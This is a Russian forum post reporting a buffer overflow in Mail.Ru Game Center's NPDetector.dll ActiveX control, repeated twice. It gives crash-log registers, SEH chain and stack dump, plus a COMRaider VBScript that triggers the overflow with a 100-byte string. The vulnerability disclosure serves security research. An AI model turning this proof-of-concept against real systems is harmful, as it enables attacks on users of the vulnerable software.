uniksoft
10.03.2014, 09:32
C:\DOCUME~1\9335~1\LOCALS~1\APPLIC~1\Mail.Ru\GAMEC E~1\NPDETE~1.DLL переполнение происходит уже при 100 байтах
кто захочет проверить
--- добавлено: 4 янв 2014 в 18:34 ---
логи
Exception Code: 0x406D1388
Disasm: 7C812AEBPOP ESI(KERNEL32.dll)
Seh Chain:
--------------------------------------------------
1B08C2BNPDetector.dll
2B08C4BNPDetector.dll
3B126DDNPDetector.dll
4B10A50NPDetector.dll
5B10A9ANPDetector.dll
6AE5BD4NPDetector.dll
77C839AC0KERNEL32.dll
Called From Returns To
--------------------------------------------------
KERNEL32.7C812AEB NPDetector.B08C21
NPDetector.B08C21 NPDetector.B12691
NPDetector.B12691 NPDetector.B10A46
NPDetector.B10A46 NPDetector.AE6222
NPDetector.AE6222 KERNEL32.7C80B713
Registers:
--------------------------------------------------
EIP 7C812AEB -> 406D1388
EAX 0196FEB4 -> 406D1388
EBX 0182F48C -> Uni: TICClientThread
ECX 00000000
EDX 0181290C -> Asc: TICClientThread
EDI 0013D9C4 -> 7C91540B
ESI 0196FF50 -> 0181290C
EBP 0196FF04 -> 0196FF54
ESP 0196FEB0 -> 00000000
Block Disassembly:
--------------------------------------------------
7C812ADBLEA EDI,[EBP-3C]
7C812ADEREP MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]
7C812AE0POP EDI
7C812AE1LEA EAX,[EBP-50]
7C812AE4PUSH EAX
7C812AE5CALL [7C801510]
7C812AEBPOP ESI 00001000
EBP+240196FF28 -> 0196FF5C
EBP+2800B08C2B -> FDC9A0E9
Stack Dump:
--------------------------------------------------
196FEB0 00 00 00 00 88 13 6D 40 00 00 00 00 00 00 00 00 [......m.........]
196FEC0 EB 2A 81 7C 04 00 00 00 00 10 00 00 0C 29 81 01 [................]
196FED0 FF FF FF FF 00 00 00 00 8D 64 AE 00 00 00 00 00 [.........d......]
196FEE0 00 00 00 00 0F 00 00 00 0C 29 81 01 0F 00 00 00 [................]
196FEF0 0F 00 00 00 E3 04 00 00 1C FF 96 01 EC 66 AE 00 [.............f..]
'File Generated by COMRaider v0.0.133
'Wscript.echo typename(target)
'for debugging/custom prolog
targetFile = "C:\DOCUME~1\9335~1\LOCALS~1\APPLIC~1\Mail.Ru\GAMEC E~1\NPDETE~1.DLL"
prototype = "Function CallIn ( ByVal Version As Long , ByVal DataType As String , ByVal Data As String ) As Long"
memberName = "CallIn"
progid = "NPDetector.GameCenterDetector"
argCount = 3
arg1=1
arg2="defaultV"
arg3=String(100, "A")
target.CallIn arg1 ,arg2 ,arg3
кто захочет проверить
--- добавлено: 4 янв 2014 в 18:34 ---
логи
Exception Code: 0x406D1388
Disasm: 7C812AEBPOP ESI(KERNEL32.dll)
Seh Chain:
--------------------------------------------------
1B08C2BNPDetector.dll
2B08C4BNPDetector.dll
3B126DDNPDetector.dll
4B10A50NPDetector.dll
5B10A9ANPDetector.dll
6AE5BD4NPDetector.dll
77C839AC0KERNEL32.dll
Called From Returns To
--------------------------------------------------
KERNEL32.7C812AEB NPDetector.B08C21
NPDetector.B08C21 NPDetector.B12691
NPDetector.B12691 NPDetector.B10A46
NPDetector.B10A46 NPDetector.AE6222
NPDetector.AE6222 KERNEL32.7C80B713
Registers:
--------------------------------------------------
EIP 7C812AEB -> 406D1388
EAX 0196FEB4 -> 406D1388
EBX 0182F48C -> Uni: TICClientThread
ECX 00000000
EDX 0181290C -> Asc: TICClientThread
EDI 0013D9C4 -> 7C91540B
ESI 0196FF50 -> 0181290C
EBP 0196FF04 -> 0196FF54
ESP 0196FEB0 -> 00000000
Block Disassembly:
--------------------------------------------------
7C812ADBLEA EDI,[EBP-3C]
7C812ADEREP MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]
7C812AE0POP EDI
7C812AE1LEA EAX,[EBP-50]
7C812AE4PUSH EAX
7C812AE5CALL [7C801510]
7C812AEBPOP ESI 00001000
EBP+240196FF28 -> 0196FF5C
EBP+2800B08C2B -> FDC9A0E9
Stack Dump:
--------------------------------------------------
196FEB0 00 00 00 00 88 13 6D 40 00 00 00 00 00 00 00 00 [......m.........]
196FEC0 EB 2A 81 7C 04 00 00 00 00 10 00 00 0C 29 81 01 [................]
196FED0 FF FF FF FF 00 00 00 00 8D 64 AE 00 00 00 00 00 [.........d......]
196FEE0 00 00 00 00 0F 00 00 00 0C 29 81 01 0F 00 00 00 [................]
196FEF0 0F 00 00 00 E3 04 00 00 1C FF 96 01 EC 66 AE 00 [.............f..]
'File Generated by COMRaider v0.0.133
'Wscript.echo typename(target)
'for debugging/custom prolog
targetFile = "C:\DOCUME~1\9335~1\LOCALS~1\APPLIC~1\Mail.Ru\GAMEC E~1\NPDETE~1.DLL"
prototype = "Function CallIn ( ByVal Version As Long , ByVal DataType As String , ByVal Data As String ) As Long"
memberName = "CallIn"
progid = "NPDetector.GameCenterDetector"
argCount = 3
arg1=1
arg2="defaultV"
arg3=String(100, "A")
target.CallIn arg1 ,arg2 ,arg3